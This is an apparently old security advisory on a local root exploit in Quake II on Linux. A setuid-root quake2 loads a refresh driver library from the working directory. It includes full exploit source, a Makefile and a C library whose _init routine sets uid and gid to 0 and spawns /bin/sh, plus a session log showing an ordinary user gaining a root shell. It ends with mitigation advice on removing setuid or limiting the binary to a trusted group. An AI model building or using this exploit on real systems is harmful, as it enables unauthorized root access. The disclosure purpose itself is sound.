COMMAND
Quake II
SYSTEMS AFFECTED
Linux (Others?)
PROBLEM
'kevingeo' posted following. Anyone who made Quake2 setuid root
in order to use the svgalib software refresh is vulnerable.
Quake2 uses dlopen(3) to load its graphics code (which is in a
seperate shared library). dlopen calls the _init function (if
applicable) before it returns. Quake2 allows you to set which
refresh driver to use on the command line, and loads the .so file
from the working directory. The exploit is a shared library with
one function; _init. It sets the uid and gid to 0, and spawns a
shell.
nop@chrome:~/ref_root> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~/ref_root> make
gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC
ld -m elf_i386 -shared -o ref_root.so -soname ref_root
/usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root
couldn't exec default.cfg
couldn't exec config.cfg
Console initialized.
------- Loading ref_root.so -------
sh-2.00#
sh-2.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.00#
Exploit follows:
--Makefile--
all: ref_root lib
ref_root:
gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC
lib: ref_root.o /usr/lib/crtendS.o /usr/lib/crtbeginS.o
ld -m elf_i386 -shared -o ref_root.so -soname ref_root /usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
--End of Makefile--
--ref_root.c--
/* ref_root (quake2 exploit) copyright (c) 1998 Kevin George */
#include <unistd.h>
#include <stdlib.h>
int _init() {
char *sh[2];
sh[0] = "/bin/sh";
sh[1] = NULL;
setuid(0);
setgid(0);
seteuid(0);
execve(sh[0], sh, NULL);
}
--End of ref_root.c--
SOLUTION
chmod u-s quake2
and use ref_softx instead of ref_soft. Proper solution until real
fix is to create a group for trusted people (call it trusted, or
console, or whatever) chown root.trusted quake2 chmod 4750 quake2.
quake2 is not usable in a window. It is much more proper to limit
the game to trusted people than to (essentially) remove it
entirely.